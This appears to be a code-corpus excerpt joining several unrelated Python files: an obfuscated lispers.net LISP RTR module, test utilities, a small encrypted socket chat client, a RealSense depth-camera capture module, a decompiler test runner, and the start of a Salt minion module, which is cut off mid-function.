if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
if ( II1i == False and lisp . lisp_rloc_probing ) :
o00O0OoO = [ I1Ii11I1Ii1i , I1Ii11I1Ii1i ,
None , o0oOoO00o ]
lisp . lisp_start_rloc_probe_timer ( 1 , o00O0OoO )
oO0Oo = { "type" : "itr-crypto-port" , "port" : Ooo }
lisp . lisp_write_to_dp_socket ( oO0Oo )
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
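# Command dispatch table: maps lispers.net configuration and show commands to their handler
# functions and allowed parameters.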
i1Ii11ii1I = {
"lisp xtr-parameters" : [ ooIiI11i1I11111 , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ O00Ooo , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"subscribe-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiii , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
if 66 - 66: Oo0Ooo / OoooooooOO % I1Ii111 / iII111i + OoooooooOO
if 6 - 6: II111iiii % I1Ii111
if 41 - 41: IiII - II111iiii . II111iiii + I1IiiI
if 59 - 59: iIii1I11I1II1 % Ii1I . i11iIiiIii
if 59 - 59: o0oOOo0O0Ooo . oO0o . Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
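# Receive a packet on the LISP-Trace port, decode it, and cache the translated address/port
# for NAT traversal.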
def o0o00OOOO ( lisp_socket ) :
if 42 - 42: ooOoO0o * iII111i
if 2 - 2: iII111i . OoO0O00 / oO0o
if 41 - 41: OoO0O00 . I1Ii111 * IiII * I1Ii111
if 74 - 74: iIii1I11I1II1 / o0oOOo0O0Ooo
Oo0o0O0o , oO0o0O0Ooo0o , i1I , iI11I = lisp . lisp_receive ( lisp_socket , False )
iii1IiI1i = lisp . lisp_trace ( )
if ( iii1IiI1i . decode ( iI11I ) == False ) : return
if 93 - 93: i1IIi % OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo . O0 % OOooOOo
if 88 - 88: oO0o % Oo0Ooo - I11i % oO0o + IiII - iII111i
if 23 - 23: O0
if 9 - 9: I11i * Oo0Ooo . ooOoO0o * i11iIiiIii - O0
if 54 - 54: I1IiiI * OOooOOo + o0oOOo0O0Ooo % i1IIi - o0oOOo0O0Ooo + OoOoOO00
iii1IiI1i . rtr_cache_nat_trace ( oO0o0O0Ooo0o , i1I )
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
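# Main entry point: initialize the RTR, then service the punt, trace, control, and IPC sockets
# in a select() loop until exit.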
if ( I1ii1Ii1 ( ) == False ) :
lisp . lprint ( "lisp_rtr_startup() failed" )
lisp . lisp_print_banner ( "RTR abnormal exit" )
exit ( 1 )
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
II1IIiiI1 = [ I1Ii11I1Ii1i , Ii1iI ,
Oo , OOO0o0o ]
O00O00 = [ I1Ii11I1Ii1i ] * 3
if 66 - 66: Oo0Ooo - iIii1I11I1II1
while ( True ) :
try : iIiIIi11iI , ooo00o0o , oO00oo0o00o0o = select . select ( II1IIiiI1 , [ ] , [ ] )
except : break
if 56 - 56: OoOoOO00 % I1ii11iIi11i - Ii1I % iIii1I11I1II1
if 76 - 76: OoooooooOO * OoooooooOO - iII111i - iIii1I11I1II1 . OoooooooOO / I1ii11iIi11i
if 86 - 86: ooOoO0o
if 51 - 51: OoO0O00 - i11iIiiIii * I1IiiI
if ( lisp . lisp_ipc_data_plane and Oo in iIiIIi11iI ) :
lisp . lisp_process_punt ( Oo , Oo0o ,
Ooo )
if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
if 36 - 36: O0 / i1IIi % II111iiii / iII111i
if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if ( OOO0o0o in iIiIIi11iI ) :
o0o00OOOO ( OOO0o0o )
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: oO0o
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if 97 - 97: I1Ii111 . I11i / I1IiiI
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if ( I1Ii11I1Ii1i in iIiIIi11iI ) :
Oo0o0O0o , oO0o0O0Ooo0o , i1I , iI11I = lisp . lisp_receive ( O00O00 [ 0 ] ,
False )
if ( oO0o0O0Ooo0o == "" ) : break
if ( lisp . lisp_is_rloc_probe_request ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 90 - 90: Oo0Ooo * I1IiiI
if ( lisp . lisp_is_rloc_probe_reply ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
lisp . lisp_parse_packet ( O00O00 , iI11I , oO0o0O0Ooo0o , i1I )
if 6 - 6: I11i * oO0o / OoooooooOO % Ii1I * o0oOOo0O0Ooo
if 28 - 28: IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if ( Ii1iI in iIiIIi11iI ) :
Oo0o0O0o , oO0o0O0Ooo0o , i1I , iI11I = lisp . lisp_receive ( Ii1iI , True )
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if ( oO0o0O0Ooo0o == "" ) : break
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if ( Oo0o0O0o == "command" ) :
if ( iI11I == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 38 - 38: I1Ii111
if ( iI11I . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( iI11I )
continue
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
lispconfig . lisp_process_command ( Ii1iI , Oo0o0O0o ,
iI11I , "lisp-rtr" , [ i1Ii11ii1I ] )
elif ( Oo0o0O0o == "api" ) :
lisp . lisp_process_api ( "lisp-rtr" , Ii1iI , iI11I )
elif ( Oo0o0O0o == "data-packet" ) :
ooO0o ( iI11I , "" )
else :
if ( lisp . lisp_is_rloc_probe_request ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 22 - 22: oO0o * iII111i
if ( lisp . lisp_is_rloc_probe_reply ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
lisp . lisp_parse_packet ( Oo0o , iI11I , oO0o0O0Ooo0o , i1I )
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
ooOOO00oOOooO ( )
lisp . lisp_print_banner ( "RTR normal exit" )
exit ( 0 )
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
setup.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import asyncio
import contextlib
import functools
import json
import os
import socketserver
import tempfile
import threading
from pathlib import Path
from typing import (
Any,
Awaitable,
Callable,
Generator,
Iterable,
Mapping,
Optional,
Type,
TypeVar,
)
from pyre_extensions import ParameterSpecification
from ..find_directories import CONFIGURATION_FILE, LOCAL_CONFIGURATION_FILE
TParams = ParameterSpecification("TParams")
T = TypeVar("T")
def ensure_files_exist(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.parent.mkdir(parents=True, exist_ok=True)
full_path.touch(exist_ok=True)
def ensure_directories_exists(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.mkdir(parents=True, exist_ok=True)
def write_configuration_file(
root: Path, content: Mapping[str, Any], relative: Optional[str] = None
) -> None:
if relative is None:
(root / CONFIGURATION_FILE).write_text(json.dumps(content))
else:
local_root = root / relative
local_root.mkdir(parents=True, exist_ok=True)
(local_root / LOCAL_CONFIGURATION_FILE).write_text(json.dumps(content))
@contextlib.contextmanager
def switch_working_directory(directory: Path) -> Generator[None, None, None]:
original_directory = Path(".").resolve()
try:
os.chdir(str(directory))
yield None
finally:
os.chdir(str(original_directory))
@contextlib.contextmanager
def switch_environment(environment: Mapping[str, str]) -> Generator[None, None, None]:
old_environment = dict(os.environ)
os.environ.clear()
os.environ.update(environment)
try:
yield
finally:
os.environ.clear()
os.environ.update(old_environment)
def async_test(func: Callable[TParams, Awaitable[T]]) -> Callable[TParams, T]:
"""
Simple Decorator to allow for asyncio test methods in a standard
`unittest.TestCase`.
"""
@functools.wraps(func)
def wrapper(*args: TParams.args, **kwargs: TParams.kwargs) -> T:
return asyncio.get_event_loop().run_until_complete(func(*args, **kwargs))
return wrapper
class TestServer(socketserver.ThreadingMixIn, socketserver.UnixStreamServer):
pass
@contextlib.contextmanager
def spawn_unix_stream_server_with_socket(
handler: Type[socketserver.BaseRequestHandler], socket_path: Path
) -> Generator[None, None, None]:
# Spawn a test server on another thread
server = TestServer(str(socket_path), handler)
server_thread = threading.Thread(target=server.serve_forever)
try:
server_thread.start()
yield
finally:
# Shutdown the server and terminate the test
server.shutdown()
server.server_close()
@contextlib.contextmanager
def spawn_unix_stream_server(
handler: Type[socketserver.BaseRequestHandler],
) -> Generator[Path, None, None]:
# Force /tmp as the temporary root, so path length would be under control
with tempfile.TemporaryDirectory(dir="/tmp") as socket_root:
socket_path = Path(socket_root) / "test.socket"
with spawn_unix_stream_server_with_socket(handler, socket_path):
yield socket_path
|
client.py
|
from cryptoran import blockcipher, keyexchange
import socket
import select
import threading
import sys, os
from PigeonConnection import PigeonConnection
class PigeonClient(PigeonConnection):
def __init__(self, serverIP: str, serverPort: int, messageHandler,
disconnectionHandler: callable, cipherIV = None, cipher = None):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((serverIP, serverPort))
self.bufferSize = 1024
self.connectionAlive = True
self.disconnectionHandler = disconnectionHandler
self.printLock = threading.Lock()
# encryption
self.cipherClass = None
self.cipher = None
if cipher:
self.dh = None
self.cipherClass = cipher
self.iv = cipherIV
self.cipher = None
super().__init__(serverIP, serverPort, messageHandler)
def listen(self):
if self.cipherClass:
# 1 - set common secret key with server
dhRaw = self.sock.recv(1024)
dhInfo = self.decodeUnencrypted(dhRaw)
if not isinstance(dhInfo, list):
# No DH parameters were received, so no shared key can be derived; stop instead of crashing below
print('Server is probably not using encryption')
self.connectionAlive = False
return
self.dh = keyexchange.DiffieHellman(dhInfo[0], dhInfo[1])
_, _, expSecret = self.dh.generateSecret()
self.sendUnencrypted(expSecret, self.sock)
cipherKey = self.dh.generateSharedKey(dhInfo[2])
self.cipher = self.cipherClass('cbc', cipherKey, self.iv)
while self.connectionAlive:
try:
readable, _, _ = select.select([self.sock], [], [], 0.1)
for _ in readable:
payload = self.sock.recv(self.bufferSize)
if not payload:
raise Exception()
else:
with self.printLock:
self.messageHandler(self.decodeReceived(payload, self.cipher))
except:
self.connectionAlive = False
self.disconnectionHandler()
break
def start(self):
threading.Thread(target=self.listen).start()
def stop(self):
self.connectionAlive = False
self.sock.close()
def send(self, message):
self.sendMessage(message, (self.sock, self.cipher))
def isConnected(self):
return self.connectionAlive
if __name__ == '__main__':
aesiv = 0xed7ef412977a7df3af9e67307bd2214b
ip, port = None, None
userTermination = False
unsafe = False
try:
ip = sys.argv[1]
port = int(sys.argv[2])
if len(sys.argv) > 3 and sys.argv[3] == '--unsafe':
unsafe = True
except:
print('usage: python client.py ip port [--unsafe]')
sys.exit()
def disconnectionHandler():
print('disconnected from server!')
sys.exit()
def connectionHandler(message: str):
print(f'Server: {message}')
client = None
if not unsafe:
client = PigeonClient(ip, port, connectionHandler, disconnectionHandler, aesiv, blockcipher.AES)
else:
client = PigeonClient(ip, port, connectionHandler, disconnectionHandler)
client.start()
print('Connected to server\nInput ".exit" to terminate the program')
while client.isConnected():
message = input()
if message == '.exit':
userTermination = True
print('Terminating connection')
client.stop()
break
client.send(message)
|
stream.py
|
##########################################################################################################################################
## License: Apache 2.0. See LICENSE file in root directory. ##
##########################################################################################################################################
"""
Capture a stream of 3D scans from all connected Intel RealSense D4XX cameras
Distributed as a module of DynaMo: https://github.com/anderson-cu-bioastronautics/dynamo_realsense-capture
"""
import pyrealsense2 as rs
import pickle
import queue
import threading
import time
import os
import copy
import numpy as np
from .view import depthFrametoPC
def captureThread(q,deviceManager,stream_time):
"""
Function to capture frames from connected RealSense Cameras to memory
Parameters
----------
q : Queue object
Queue for storing captured frames
deviceManager : DeviceManager object
realsense_device_manager object which manages connections to all cameras
stream_time : float
Time in seconds for how long to collect data
"""
i=0
refSerial = list(deviceManager._enabled_devices.keys())[0]
fnumber = deviceManager.poll_frames()[refSerial].get_frame_number() #get frame number to ensure subsequent frames are saved
while i<int(90*stream_time):
frames = deviceManager.poll_frames()
newfnumber = frames[refSerial].get_frame_number()
if fnumber != newfnumber: #only save if frame has not already been saved
q.put(frames)
i+=1
print(str(newfnumber)+' '+str(i)+'/'+str(int(90*stream_time)))
fnumber = newfnumber
def processThread(q,devicesTransformation, saveDirectory):
"""
Function to process frames from queue to save to disk in pickle format
Parameters
----------
q : Queue object
Queue which stores captured frames
devicesTransformation : dict
dictionary with keys of camera's serial number holding dictionary of calibration parameters per camera
saveDirectory : str
Folder name in which to save frames, referenced to current working directory
"""
i=0
while not q.empty(): #while frames are still waiting to be processed
framesAll = q.get()
fname = os.path.join(saveDirectory, format(i, '05d') + '.pickle')
file = open(fname,'wb')
savedData={}
for device,frames in framesAll.items():
deviceData = {}
align = rs.align(rs.stream.depth) #setup rs.align object
alignedFrames = align.process(frames) #align frames
depthFrame = alignedFrames.get_depth_frame()
rsIntrinsics = depthFrame.get_profile().as_video_stream_profile().get_intrinsics()
deviceData['depth'] = copy.deepcopy(np.asanyarray(depthFrame.get_data())) #save depth frame
try:
infraredFrame = alignedFrames.get_infrared_frame(1)
deviceData['infrared'] = copy.deepcopy(np.asanyarray(infraredFrame.get_data())) #save infrared frame
except:
pass
try:
colorFrame = alignedFrames.get_color_frame()
deviceData['color'] = copy.deepcopy(np.asanyarray(colorFrame.get_data())) #save color frame
except:
pass
deviceData['intrinsics'] = {'ppx': rsIntrinsics.ppx, 'ppy':rsIntrinsics.ppy, 'fx':rsIntrinsics.fx, 'fy':rsIntrinsics.fy} #save relevant intrinsics
deviceData['poseMat'] = devicesTransformation[device][0] #save transformation matrix
savedData[device]=deviceData #save each camera's information in master dictionary for frame
pickle.dump(copy.deepcopy(savedData),file)
print('processed'+str(i))
i+=1
file.close()
q.task_done()
print('queue finished')
def single(deviceManager, devicesTransformation):
"""
Function to return a single, aligned pointcloud from connected RealSense Cameras
Parameters
----------
deviceManager : DeviceManager object
realsense_device_manager object which manages connections to all cameras
devicesTransformation : dict
dictionary with keys of camera's serial number holding dictionary of calibration parameters per camera
Returns
-------
allPoints : (n,6) array
array containing list of all points from all connected cameras
"""
frames = deviceManager.poll_frames()
allPoints = np.empty((0,6))
for camera,frame in frames.items():
deviceData = {}
align = rs.align(rs.stream.depth) #setup rs.align object
alignedFrames = align.process(frame) #align frames
depthFrame = alignedFrames.get_depth_frame()
rsIntrinsics = depthFrame.get_profile().as_video_stream_profile().get_intrinsics()
deviceData['depth'] = copy.deepcopy(np.asanyarray(depthFrame.get_data())) #save depth frame
try:
infraredFrame = alignedFrames.get_infrared_frame(1)
deviceData['infrared'] = copy.deepcopy(np.asanyarray(infraredFrame.get_data())) #save infrared frame
except:
pass
try:
colorFrame = alignedFrames.get_color_frame()
deviceData['color'] = copy.deepcopy(np.asanyarray(colorFrame.get_data())) #save color frame
except:
pass
deviceData['intrinsics'] = {'ppx': rsIntrinsics.ppx, 'ppy':rsIntrinsics.ppy, 'fx':rsIntrinsics.fx, 'fy':rsIntrinsics.fy} #save relevant intrinsics
deviceData['poseMat'] = devicesTransformation[camera][0] #save transformation matrix
points = depthFrametoPC(deviceData, format='rgb')
allPoints = np.append(allPoints, points, axis=0)
return allPoints
def start(deviceManager, deviceTransformations, saveDirectory, stream_time):
"""
Function to save aligned frames from connected RealSense Cameras to disk for future processing
Parameters
----------
deviceManager : DeviceManager object
realsense_device_manager object which manages connections to all cameras
deviceTransformations : dict
dictionary with keys of camera's serial number holding dictionary of calibration parameters per camera
saveDirectory : str
Folder name in which to save frames, referenced to current working directory
stream_time : float
Time in seconds for how long to collect data
"""
q = queue.Queue(maxsize=0) #queue object to hold incoming frames
capture = threading.Thread(target=captureThread,args=(q,deviceManager,int(stream_time))) #thread which will capture frames
process = threading.Thread(target=processThread,args=(q,deviceTransformations,saveDirectory)) #thread which will save frames to disk
capture.start()
capture.join()
time.sleep(int(stream_time)+1) #delay to allow capture thread to finish, this may or may not be needed based on hardware specifications but is recommended to reduce dropped frames
process.start()
process.join()
q.join()
|
run_tests.py
|
from __future__ import print_function
from os import walk
from os.path import join
import sys, signal
from datetime import datetime
from multiprocessing import Process, Manager, Lock
from aggregatortester import AggregatorTester
from optimizertester import OptimizerTester
from liftertester import LifterTester
from structurertester import StructurerTester
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def worker(lock, file_path, exceptions, total, tester):
file_name = file_path.split("/")[-1]
eprint("start " + file_name)
if file_name == "ak":
print("fix this one later")
return
with open(file_path) as file:
count = 0
for count, line in enumerate(file):
if count == 50:
break
# eprint(file_name, count)
try:
tester(line, False)
signal.alarm(0)
except Exception as ex:
signal.alarm(0)
transaction = "%s:%d" % (file_name, count)
lock.acquire()
exceptions[transaction] = (ex, len(line) / 1024)
lock.release()
# eprint(file_name, count)
signal.alarm(0)
lock.acquire()
eprint("end %s %d" % (file_name, count))
total.value += count
lock.release()
def output_exception_report(path, exceptions, total):
exception_report = open(path, "w")
exception_report.write("total count %d\n" % total)
exception_report.write("exception count %d\n" % len(exceptions))
exception_report.write("=" * 20 + "\n")
exception_types = dict()
for ex, _ in exceptions.values():
exception_type = type(ex).__name__
if exception_type not in exception_types:
exception_types[exception_type] = 0
exception_types[exception_type] += 1
for exception_type, c in exception_types.items():
exception_report.write("%s : %d\n" % (exception_type, c))
exception_report.write("=" * 20 + "\n")
for count, (ex, code_size) in exceptions.items():
exception_report.write("%s : %d [%s] %s\n" % (count, code_size, type(ex).__name__, str(ex)))
exception_report.close()
if __name__ == '__main__':
if "-l" in sys.argv:
tester = LifterTester
elif "-o" in sys.argv:
tester = OptimizerTester
elif "-a" in sys.argv:
tester = AggregatorTester
elif "-s" in sys.argv:
tester = StructurerTester
else:
eprint("tester not specified")
sys.exit()
manager = Manager()
exceptions = manager.dict()
lock = Lock()
total = manager.Value('total', 0)
target_files = []
for (path, _, file_names) in walk(sys.argv[-1]):
for file_name in file_names:
target_files.append(join(path, file_name))
break
processes = \
[Process(target=worker, args=(lock, f, exceptions, total, tester)) for f in target_files]
[process.start() for process in processes]
[process.join() for process in processes]
print("processes joined")
file_path = "reports/" + tester.__name__ + datetime.now().strftime('_%m-%d-%H-%M')
output_exception_report(file_path, exceptions, total.value)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import re
import sys
import copy
import time
import types
import signal
import random
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
